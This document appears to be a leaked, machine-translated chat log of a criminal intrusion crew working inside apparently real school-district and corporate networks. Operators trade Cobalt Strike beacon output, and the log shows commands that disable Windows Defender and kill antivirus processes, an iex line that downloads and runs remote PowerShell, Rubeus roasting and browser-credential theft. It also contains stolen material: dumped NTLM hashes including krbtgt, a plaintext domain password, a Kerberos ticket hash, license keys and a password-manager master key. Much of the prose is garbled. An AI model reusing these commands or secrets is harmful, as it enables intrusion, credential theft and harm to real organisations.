Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 2576;
	ReturnValue = 0;
};


``Tool is in place, so everything is ok maybe remove the blank spaces from the > sign, if there is then it is the wrong way to run it check in system32 the utility file is not in the directory in short it did not work`sisd.k12\ExchAdmin f461d17330cadafe07025e2252256eda52a` under these creeds did not even copy it there for some reason... I don't see what the problem is with this)‖dll starts,‖ which means you somehow execute commands and you have mapping there.‖ Nowdll starts but no session arrives. User7 will come to him for details I think you have a way to start or not knocking?[ ](https://mediaeveryone.com/group/sisd-net?msg=zxeqyR78o3vFDDKu) do not come up i.e. there is no way to control? and stask? wmi disabled I'm waiting for the day I think you know the answer you need a session to work on a remote host? how kids already want to scoldbozhej jump on them did not work, I now try through sharpsbeck dns where?no, everything is correct - not rising and the sessions now let's try again, i screwed up like that just tell me what is it with dhc01 with dhcp role it can be in this network dhcp servers are called dhcp1 and dhcp2 now to the question of sessions on dhcp I did not read the messages above nudhcp and dhcp for the guys the same thing?dhcp1 and dhcp2) now the session is dhcp1 and dhcp2. dhcp does not work with dhcp I do not know how it works with you at all forget about the jump on them dll not copy, jump also does not work they just dhcp called dhcp, dnsa why dhcp you? 3 servers can not jump to dhcp static
Windows IP Configuration

   Host Name . . . . . .: SchoolBooks
   Primary Dns Suffix . . . . ♪ admin.sisd.k12 ♪
   Node Type . . . . .: Hybrid
   IP Routing Enabled. . . . : No
   WINS Proxy Enabled. .: No
   DNS Suffix Search List. .: admin.sisd.k12
                                       sisd.k12

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix :
   Description . . . . . . .: Microsoft Hyper-V Network Adapter.
   Physical Address . . . . .: 00-15-5D-01-DF-19
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled . .: Yes
   Link-local IPv6 Address . : fe80::740f:5d54:8746:1b6d%6(Preferred)
   IPv4 Address . . . . .: 10.0.51.46(Preferred)
   Subnet Mask . . . : 255.255.0.0
   Default Gateway . . . . : 10.0.1.254
   DHCPv6 IAID . . . . : 100668765
   DHCPv6 Client DUID . . . . : 00-01-00-01-26-88-57-CF-00-15-5D-01-DF-19
   DNS Servers . . . . : 10.0.51.74
                                       10.0.51.75
   NetBIOS over Tcpip. . . . .: Enabled

``````
Network Card(s): 1 NIC(s) Installed.
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 10.0.51.46
                                 [02]: fe80::740f:5d54:8746:1b6d

``I also check that we have statics on all servers partially dhcp on armas?
Network Card(s): 1 NIC(s) Installed.
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 10.0.51.3
                                 [02]: fe80::3c15:2b64:760d:eb2b

``And dnscmd is only on dns servers? Do not shoot all in a row check a few armies and servers and tell me exactly where it is, let's do it without maybe on the servers maybe static?
Windows IP Configuration

   Host Name . . . . . . ♪ Geordi ♪
   Primary Dns Suffix . . . : sisd.k12
   Node Type . . . . .: Hybrid
   IP Routing Enabled . . . . No.
   WINS Proxy Enabled. .: No
   DNS Suffix Search List. : sisd.k12

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix :
   Description . . . . . . .: Microsoft Hyper-V Network Adapter.
   Physical Address . . . . : 00-15-5D-01-80-12
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled . .: Yes
   Link-local IPv6 Address . : fe80::3c15:2b64:760d:eb2b%4(Preferred)
   IPv4 Address . . . . .: 10.0.51.3(Preferred)
   Subnet Mask . . . : 255.255.0.0
   Default Gateway . . . . : 10.0.1.254
   DHCPv6 IAID . . . . . : 50337117
   DHCPv6 Client DUID . . . . : 00-01-00-01-23-90-84-20-00-15-5D-01-80-12
   DNS Servers . . . . : 10.0.51.74
                                       10.0.51.75
   NetBIOS over Tcpip . . . ♪ Enabled ♪

Tunnel adapter Local Area Connection* 2:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . ♪ Microsoft ISATAP Adapter ♪
   Physical Address . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled . .: Yes

````for /f %a in (AllZones.txt) do dnscmd /ZoneExport %a %a.txt `
at first
` dnscmd /enumzones > AllZones.txt ` how to remove dns I'll tell you a few arms just in case and from the second? yes that's from this domain as I understand `
Connection-specific DNS Suffix . : admin.sisd.k12
``[ ](https://mediaeveryone.com/group/sisd-net?msg=x2ctb3ESgCPjiNgNn) from Armagh.
   DNS Servers . . . . : 10.0.51.74
                                       10.0.51.75
``[ ](https://mediaeveryone.com/group/sisd-net?msg=96HNaj7DMbYkmC8Mt) what's that from?
beacon> shell ipconfig /all
[*] Tasked beacon to run: ipconfig /all
[+] host called home, sent: 44 bytes
[+] received output:

Windows IP Configuration

   Host Name . . . . . : SRM-312-020.
   Primary Dns Suffix . . . . ♪ admin.sisd.k12 ♪
   Node Type . . . . Hybrid
   IP Routing Enabled . . . . : No
   WINS Proxy Enabled. .: No
   DNS Suffix Search List. .: admin.sisd.k12
                                       sisd.k12
                                       sisd.k12

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix . . : admin.sisd.k12
   Description . . . . . ♪ Realtek PCIe GBE Family Controller ♪
   Physical Address . . . . : B8-85-84-AA-FB-02
   DHCP Enabled. . . . . .: Yes
   Autoconfiguration Enabled. .: Yes
   IPv4 Address. : 10.57.243.225(Preferred)
   Subnet Mask . . . : 255.255.0.0
   Lease Obtained . . . . ♪ Wednesday, September 16, 2020 5:30:41 PM ♪
   Lease Expires . . . . .: Tuesday, December 8, 2020 5:31:27 PM
   Default Gateway . . . . : 10.57.1.254
   DHCP Server . . . . : 10.0.51.4
   DNS Servers . . . . : 10.0.51.74
                                       10.0.51.75
   NetBIOS over Tcpip . . . ♪ Enabled ♪

``+ remove dns in general find infuna unlikely staticsu armaments dhcp or statics? in general here they also pinged probably) citricos armaments? I mean, they change from time to time citricos dhcpdns not see statics or dhcp in armaments? already all pinged`` ``
 take off the dhcp
see the armies on dhcp or static
and ping them
``There's a problem for 1 man-session in two domains in the slip so far, throw in a good jobWin Def
```
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Windows\ /t reg_dword /d 0 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
reg add "HKLM_SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
reg add "HKLM/SSOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
reg add "HKLM/SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
reg add "HKLM/SOFTWARE\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f
``Symantec
```
net stop srservice
``Avast
```
@Echo off
taskkill /f /im ashMaiSv.exe
taskkill /f /im ashServ.exe
taskkill /f /im aswUpdSv.exe
taskkill /f /im ashDisp.exe
Exit /b
``[ ](https://mediaeveryone.com/group/sisd-net?msg=wfYTtjYHM5woBJWMs) I've only seen it on one viewIf there is no central system let someone look for ways to turn off all the avers manuallywhat's this thing that bothers me...> 200 servos and > 4000 users then it turns out 3 people from here without tasks yet? as usual all of them. then we wait. will only steal servos or users too? dept will not do it we have contact with dept, maybe order it ourselves?we have to wait for tl2build now there is no tl2build, let's finish with it then? ok, where as. there solyanka assembled and the rest are empty? mostly on the file and skulas bitdefender stands, if i'm not mistaken plus/minus when the servos sorted from each processlists took a lot more than 50% of all the servers?[ ](https://mediaeveryone.com/group/sisd-net?msg=SSZ24JGTuwpkRkWib) by process many have nothing but vindef at all how did you determine? differently the server segment is covered by what? maybe they don't have a centralized avera after all? We found avira, bitdefender, CORTEX XDR™ and I think something else...both from polzac and from the system from the context of the polzac process? sharpweb found nothing, as well as sibeltda don't forget to change the process if it kicks out don't go there1 session 1 sharpweb, not more? and here is the description
Usage:
    .\SharpWeb.exe arg0 [arg1 arg2 ...]

Arguments:
    all - Retrieve all Chrome, FireFox and IE/Edge credentials.
    full - The same as 'all'.
    chrome - Fetch saved Chrome logins.
    firefox - Fetch saved FireFox logins.
    edge - Fetch saved Internet Explorer/Microsoft Edge logins.
``see the edge folder in the projecthttp://github.com/djhohnstein/SharpeWeb does he use edge? ff? which is probably quieter than chrome) and kicked out - just sessions fell off via lazagne from the toolchain and how did you try to get them back?kicked out how? I found where the DA sits, but he kicked me out quickly, while I was trying to steal the credentials from the browser look for web access it must still be on amazon, on the data2 and dc domain sisd.k12 no admin avera - I'm there by rdp went to ...ok just describe the situation normally and not bits and pieces sketch in the general conf conf conf this case of migration between domains and was Lanu yes, but I learned that after dksinka and this polzak was LA? so maybe there was not an admin with such creds this car in the domain `ADM `, I was lucky that the local admin with the same creds do not, this is about another issue[ ] (https://mediaeveryonecom/group/sisd-net?msg=BxPbEPBQ7Q9m3tSoZ) this admin process was where you had the session? `sisd.k12\ExchAdmin f461d17330cadafe07025e2256eda52a` - under these creds you can look directories on DATA2 but session is not raised in the ADM domain admin process on what question yes?)ADMdathe domain? that domain? admin what? let me start at the beginning, I was given a session under the system, I logged into the admin process and already under it looked at directories[ ](https://mediaeveryone.com/group/sisd-net?msg=cNQpCcL7oMoYo9i6zC) how did you check the diaries? you had to have access to that domain to give you a listing diaries`Sam07bo`f461d17330cadafe07025e2256eda52a found on cmd5 @tl1 make clickpls then jumped diary checked directories of cars that domainanet, how did you get in?and the session went up after running vmikomdl scripted in dlkak did you do?
[DC] 'sisd.k12' will be the domain
[DC] 'Geordi.sisd.k12' will be the DC server
[DC] Exporting domain 'sisd.k12
[DC] ms-DS-ReplicationEpoch is: 1
502 krbtgt 473e0e4f4e2c2f68efe96bfe23e3b186 514
1001 SUPPORT_388945a0 5e62b6beff8ee61447406436dd7c8fa1 66050
1121 IWAM_PICARD d047d4e970e1f608542175fd69bf63f0 66080
1606 CMP-TCH-51-68$ 40d7e6ce37245fa0fb82021e392e32d2 4096
1111 RIKER$ 4dbc3efa9d3b7447e446d2a0614649e6 4096
1120 IUSR_PICARD 463af0a30e5de0fae941442e7aaf0c 66080
1617 DATA$ 1cf75f296f3bc0878b17689fa14e519f 4096
5610 ADFS-DIRSYNC2$ c0f22374c0e3623fd2df53d44ff7f5f3 4096
1114 DCHPAdmin f461d17330cadafe07025e2256eda52a 512
1605 ExchAdmin f461d17330cadafe07025e2252256eda52a 66048
5608 backupexec 410091ed6c810d68980fa84c69a19886 66048
5606 VDI-DDC1$ ee0400eec033d8ab2ea9950a5ab7ed18 4096
503 DefaultAccount 31d6cfe0d16ae931b73c59d7e0c089c0 514
1126 SISD-DHCP-01$ a92dfdae9dd565b420cd8f3b2dd94a05 4096
7606 AZUREADSSOACC$ 3fe49e41eba481a7dd54ae104781328d 69632
7605 DESKTOP-7EDHUBD$ 47554a274b9d9d99b57e6be985332fde 4096
7607 NTP$ c260b6cb1403ef9c878a7a1bfb3ca1ea 4096
5612 DATA2$ bf7ecf55672760909a29e3a8e1aa368 4096
500 Administrator 410091ed6c810d68980fa84c69a19886 66048
7104 ADFS-DIRSYNC$ ed73098ff2fddf912c76e93a79c3d6d5 4096
7105 GEORDI$ e8cc320ade6b5ce43ddc553dd50e00db 532480
1106 ADM$ 5a98229bc5afbb1d30651d119bd9d9f9 2080
8604 LOR$ 07d2c1dcbb443c103fecc651475c9cb2 532480
7604 PICARD$ 84a342f7e77ce8d1dc718316105011fa 532480
5108 DATA3$ 3fb5d4e111cf430273321d4d19378a49 4096
``USSC1500slip in 400 sec and leavesessions from rundll processes move to the systemmemo for tomorrowLocal admins found, hashes collected, go to the domainuntil then draw a line last message and for tomorrow check domain availability againCheck domain availability againTomorrow) you bypassed yuac module which disassembled) I about local admin[ ](https://mediaeveryone.com/group/usscgroup?msg=F4MBctxLgBSNGajBK) have not paid attention?
 Username : stwitchell
	 * Domain : USSCGROUP.LOCAL
	 * Password : 3stwitchell3#
``Local admin list still + password from the current one``
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
%GuestUssc!!:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nimda99:1001:aad3b435b51404eeaad3b435b51404ee:aae35fd0e9edf9eee30d512cdcdbc773:::
PCPitstopSVC:1002:aad3b435b51404eeaad3b435b51404ee:c242ba17550668998afeb36cbb1992f0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a37c6648cb801450e1316a6b58d94aa8:::
``ask your colleagues how they got around yuac, you also polozak local admin today to a maximum of 12 hours, if you do your volume, tomorrow you can safely parse records)did not sign what the docs?)but I do not think that you for so many days of study, all written in one doc and did not delimit it in any way@user1 will have time, be sure)[ ](https://mediaeveryone.com/group/usscgroup?msg=Kqt3htCFgYRoGeoh8) do not remember, most likely yes `User USSC1500\Nimda99 S-1-5-21-2785713682-3075257879-4011609139-1001`
and 1001 on the end means that the admin ?we had so many modules, we ran them for days in the lab and made notes, or they have run out?) not enough information? collect more and what is it? how to be further? you have ad info? don'tttalk on gathered info or dilute less loadeda meanwhile, if the session began to take commands again, you can send thema)[ ](https://mediaeveryone.com/group/usscgroup?msg=TQe8r8DwKcwkHvxTr) as soon as the session died out (passed the slip, then returned to normal) and no output came, you can continue to write commands)``[]
[!] CVE-2019-1064 : VULNERABLE
  [>] https://www.rythmstick.net/posts/cve-2019-1064/

 [!] CVE-2019-1130 : VULNERABLE
  [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

 [!] CVE-2019-1253 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2019-1253

 [!] CVE-2019-1315 : VULNERABLE
  [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

 [!] CVE-2019-1385 : VULNERABLE
  [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

 [!] CVE-2019-1388 : VULNERABLE
  [>] https://github.com/jas502n/CVE-2019-1388

 [!] CVE-2019-1405 : VULNERABLE
  [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
  [>] https://github.com/apt69/COMahawk


``Why don't you raise the context?)``caption is not raised? dk? specifically adfindthere is no point in hiding, because the running software is legitimatejust `shell adfind.bat``why do you use powerpik to work with exe launching?tl2user2+user7 I will add and you can do spidran)will do tomorrow, for now just a list of users here on work with this session before tomorrow + In all green sent @сlose and delete files if there were do not forget to close sessionsTesting this script pack https://github.com/S3cur3Th1sSh1t/Creds/tree/master/PowershellScriptsтогда change the script `The term 'CheckIfWindowsIsCore' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
C:Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 SetkRegSmbv3Compression -value 1
The term 'SetkRegSmbv3Compression' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0064

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 CVE-2020-0796-Smbv3-checker.ps1 SetkRegSmbv3Compression -value 1
The term 'CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0044
``It doesn't work taki tSetkRegSmbv3Compression -value 1```
SetkRegSmbv3Compression -value 0

``that kind of thing''.
Do {
    Get-Menu
    $input = Read-Host "Please make a selection"
    switch ($input) {
        '1' {
            Write-Host 'You chose option #1'
            CheckRegSmbv3Compression
        } '2' {
            Write-Host 'You chose option #2'
            SetkRegSmbv3Compression -value 1
        } '3' {
            Write-Host 'You chose option #3'
            SetkRegSmbv3Compression -value 0
        } 'Q' {
            return
        }
    }
    pause
}
``````
C:\Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 CVE-2020-0796-Smbv3-checker.ps1
The term 'CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0080

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 CVE-2020-0796
The term 'CVE-2020-0796' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0045

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 CVE-2020-0796-Smbv3-checker
The term 'CVE-2020-0796-Smbv3-checker' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0057

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/T13nn3s/CVE-2020-0796/master/CVE-2020-0796-Smbv3-checker.ps1'));

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 CVE-2020-0796-Smbv3-checker
The term 'CVE-2020-0796-Smbv3-checker' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0048

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 CVE-2020-0796-Smbv3-checker.ps1
The term 'CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0044

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 .\CVE-2020-0796-Smbv3-checker.ps1
The term '.\CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0058

C:{Windows\System32\WindowsPowerShell\v1.0
BBCTX6 @ MAPCIASP\bbbwalkerj
 ./CVE-2020-0796-Smbv3-checker.ps1
The term './CVE-2020-0796-Smbv3-checker.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0030
``Isn't the session dead after importing?
 iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/T13nn3s/CVE-2020-0796/master/CVE-2020-0796-Smbv3-checker.ps1'));
`` How do I apply it? So CVE-2020-0796-Smbv3-checker.ps1 and so CVE-2020-0796-Smbv3-checker doesn't work.Help another command while sessions[ ](https://mediaeveryone.com/group/zohocorpin-com?msg=WnzRANjv9WyDTJovG) Lёh, here's up to 150ZT-0314jesh-6396 ``
File exceeds allowed size of 100 MB. [error-file-too-large]
``would it be better to download it here as an archive or as a file? ad_users downloaded yes, endpoint((*with a password, if there is an endpoint, then only disable it in the password@tl1 and kasper can shut it up for a while?i hope you'll be able to download it in a few minutes........then i looked at the size.....first i told you to download it......i'm smart......i hope you'll be able to download it.......how much do you think it'll weigh?
[X] KRB-ERROR (23) : KDC_ERR_KEY_EXPIRED

``````
[X] No users found to Kerberoast!

``Both of the hash types try to take the rube off``.
beacon> shell net group "enterprise admins" /dom
[*] Tasked beacon to run: net group "enterprise admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator pmpdemo rmp
The command completed successfully.

``````
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain csez.zohocorpin.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator adssp assetprober
desktopcentral gjprabu-0985 kamal-0150
nocfw sysadmin sysaudit
vijay-3486 zohoits
The command completed successfully.

``The file is gone again.
[*] Action: AS-REP roasting

[*] Target Domain : csez.zohocorpin.com

[*] Searching path 'LDAP://est-adc2.csez.zohocorpin.com/DC=csez,DC=zohocorpin,DC=com' for AS-REP roastable users
[*] SamAccountName : gunas-0326
[*] DistinguishedName : CN=Gunaseelan Parthiban,OU=Windows Server Management,OU=ManageEngine,OU=Users,OU=All Users and Computers,DC=csez,DC=zohocorpin,DC=com
[*] Using domain controller: est-adc2.csez.zohocorpin.com (192.168.100.93)
[*] Building AS-REQ (w/o preauth) for: 'csez.zohocorpin.com\gunas-0326'

[X] KRB-ERROR (23) : KDC_ERR_KEY_EXPIRED

[*] Roasted hashes written to : C:\Users\raja-9298\EULA_as.txt

``Let's put it this way.
execute-assembly /Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
``Not even a blank and no output file, actually``
beacon> execute-assembly /home/user/Desktop/cobalt/Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\Users\raja-9298\EULA_ha.txt


[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Searching the current domain for Kerberoastable users
[X] No users found for Kerberoast!
[*] Roasted hashes written to : C:\Users\raja-9298\EULA_ha.txt
``Did you do it?'' in #general and ``AdventNetLicense.xml 3
```
ACNTRL="NO" CompanyName="International Systems Engineering" EmailID="t.basheer@ise.sa" ExpiryDate="2022-10-07" Key="nJbGSnDTGRbp9NS3GAPD9fRRpy7TAdPQdP3TuSKRlcPyGNT7KJQTQ1b7JpPVQaSnGRbp9TSzGQ1GyTSzJRP7eabTGRbGa1bTfN3GSnxnnPbp9nxndpX9SPlydP3uzlZdpQ71uDfZpJXu1bdfyQ3GbSpdpT7KbTSfVXGSPPy" LicenseType="Registered" Name="International Systems Engineering

<LicenseKey>.
5WUV0UZ10Wv4XdNj84XRvNvDbWZTVi1UenjdjenjmjYIvN8iNvviXNXmaiN8sNvY8L4YX4NjPkRXGNjYvoX8QXRAs8GKXokR4NKjYLXvvNvrvHk4RvsKvsNvY8LXsIvs8aRvvCsXQI44YX4NjPkRXm8RpWZ5VW11djvsNvY8lWV10U111UW0V1djRvmj4sKPsL8X4vdvsNvY8l5WskvzFORvQmKn0v4XdLX8Rtskvz0skvzLX8RtFOjnRviXNXmkvz01N8mGXvsLXFpMpGv98LXYjlsRvswvs8RHRv4NgRviXNXMGRjvssXp0I0IT28RtssXpsLXR4NvPvRKYvodjdj
````AdventNetLicense.xml 2 ``
```
ACNTRL="NO" CompanyName="International Systems Engineering" EmailID="t.basheer@ise.sa" ExpiryDate="2022-10-07" Key="nJbGSnDTGRbp9NS3GAPD9fRRpy7TAdPQdP3TuSKRlcPyGNT7KJQTQ1b7JpPVQaSnGRbp9TSzGQ1GyTSzJRP7eabTGRbGa1bTfN3GSnxnnPbp9nxndpX9SPlydPP3uzlZdpQ71uDfZpJXu1bdfyQ3GbSpdpT7KbTSfVXGSPPy" LicenseType="Registered" Name="International Systems Engineering

<LicenseKey>.
5WUV0UZ10Wv4XdNj84XRvNvDbWZTVi1UenjdjenjmjYIvN8iNvviXNXmaiN8sNvY8L4YX4NjPkRXGNjYvoX8QXRAs8GKXokR4NKjYLXvvNvrvHk4RvsKvsNvY8LXsIvs8aRvvCsXQI44YX4NjPkRXm8RpWZ5VW11djvsNvY8lWV10U111UW0V1djRvmj4sKPsL8X4vdvsNvY8l5WskvzFORvQmKn0v4XdLX8Rtskvz0skvzLX8RtFOjnRviXNXmkvz01N8mGXvsLXFpMpGv98LXYjlsRvswvs8RHRv4NgRviXNXMGRjvssXp0I0IT28RtssXpsLXR4NvPvRKYvodjdj
````AdventNetLicense.xml 1`
```
ACNTRL="NO" CompanyName="Mizuho Information Research Institute Inc" EmailID="satoru.mochida@mizuho-ir.co.jp" Key="nJbGSnDTGRbp9NS3dP3XG7cydJJ97SlddJfyGnx3lcQ7ancPJdc7yVJzKJ9VSaSJJ99ancPJdc7y1bJKPDGyTdlAaDQaSnndPX9NTTnPfp97KDndV911Py3Aa97dD7ndV917K9u9P9yyPQbDufSJuyzTfzlp" LicenseType="Registered" Name="ADJ20S6024EI1"

<LicenseKey>.
10Ui0U1W0WkR8H2goMATWU60U0W0Wv4XdNj84XRvNvDbTEVTEWUenjdjenjmjYIHRjYjCj9avsNvY8LUHJ4YX4NjPkRXGNjYvoLLKNkR4NKjYGvRv4s8ivrvHk4RvsKvsNvY8LHJIjYIR8UjCK98maXG8CYjmIKRj4Xs4YX4NjPkRXm8RpiV61100000VdjvsNvY8lETE0U111U5001djRvmj4sKPsL8X4vdvsNvY8l5WskvzFORvQmKn0v4XdLX8Rtskvz0skvzLX8RtFOjnRviXNXmkvz5N8mGXvKR4pMpGv98LXYjlsRvswvs8RHRv4NgRviXNXMGRjvssXp0I0IT28RtssXpsLXR4NvPvRKYvodjdj
</LicenseKey>.
``Another file ``pmp_key.key
```
#This file contains the master AES encryption key for this installation, automatically generated by Password Manager Pro.
#The default location of this file is <PMP_HOME>conf and it is not secure to leave this file here, unless
#the server is sufficiently hardened to protect any illegal access of this file.
#It is highly recommended to move this file out of its default location and for instructions to securely store this file refer.
#Thu Jul 23 12:13:08 IST 2020
ENCRYPTIONKEY=HCUqmg5JnLRACWluto4JNAM/hevFIhFhZuxfXlFumHc\=
```
```ENCRYPTIONKEY=HCUqmg5JnLRACWluto4JNAM/hevFIhFhZuxfXlFumHc=``[*] Tasked beacon to run .NET program: SharpRoast.exe all
[+] host called home, sent: 120881 bytes
[+] received output:
SamAccountName : certsrv
DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName : http/its-winca.csez.zohocorpin.com
Hash : $krb5tgs$18$$*$csez.zohocorpin.com$http/its-winca.csez.zohocorpin.com*$AD257AAE06
                         D3290ED5802E98A5680072$074EFBF3ED77AAD8403FFD9B1DC91C3A4548ABC68CC6D82693883D1F2
                         674826398708B33E7474B1A7A88CDBB147CEE0E9E55DF333D38AF6E6BF1FFCC9B9848E96372B2684
                         F5D616B986D16C673820FEF3EDFE905FC2EC48B0BE46A4AC3229930167A88F92124F509C9FE99EE6
                         074CA3F7443F08AB4F49CE97F02D83CE21E7958541219280C06EC0259FFEE7DD9BDA9FCC28C69984
                         884576F8A098B0507E45E2EA3A6FBACB1CEFF7F435484F83B050C3D9B2DC68E5983963629CE1C04D
                         72CF0EFA00AA01FC0BDDADDDFDCC3A9F0532EFEC4D88408B597AC74F2668E979E22348E0C6F1890B
                         1AE0F8D2724492417699C3BD444312212A5FF50A246D4D5770AD50860E3B52CCD2BCE7A6660DA9B6
                         FFE81B456129A617FBF351F815FE23624699E69EFB4F4788531E5677B125136BCF1AD9DCC3C8C139
                         B36C05C5A493BE7237E14D4F194307F1B7D53F2CA333364CAC135D79688E4A0EBB342BC3DA9C3D12
                         7255740A8843B17CAB787077BDDFEF59A916E56392DB087BE09523933671E3832D532D329B2BFCF4
                         ECDB2A51274DD50970EC9796AB56788FA7CE668093FC5D68EE6AB796574985BD1CFDAF6EE88416E9
                         5F33A3F7C29E4ED1C8804DEA928E2050A2070044A83AF610D673EAF783D3C258BF4F00F3A67EE236
                         4A19579A448CEA1806C716B3603C0C6DA9B72BFAB8390CD7971CD4FBE8F022E64828069C478D56CA
                         DE866536D19FFB5EF529F408CBC7D9F6B161164632CEE450220CA94B1CD692D9A6C4EACA431AAAD9
                         024F429182D8D0B4BAFE8C9B27BE54444DBFB4D7FE2F3949064F9CBC3034F59EF0AD9C01D0238F53
                         6614F21303664809AECFE53914D4E16B9222BD0550F8587F39AFA385E87EA7B430994234E883FB46
                         150E6BFF285F69F035C0410C11E4610C187EA4A05E57E3FEE8C1CB133DAE9549E9B9E757E0BB9A1E
                         5016A8893C2EDECD58D61216879A358AFAE0799986B31CA903B655E244C19ADBF68DB8A8417F5989
                         976B4B19CA800E5BF1E8B7227A559E146A7B63360E430B31823801CAA81E625481858F598BB10FF9
                         E31F97473E408B67297A919C3C4264ABA52F8242F4F8E07D4946AE7B146A69950C54923A895D333E
                         027820953AC4FBED2201253B15B79AC993628CADDA92AA14232A6F0974A19983099890F2119E7D64
                         C5AA329A5CE288E7CB3F66AB76619330E27380E145E089DD71799B7B511FBF9A843F8DF6973EBBAC
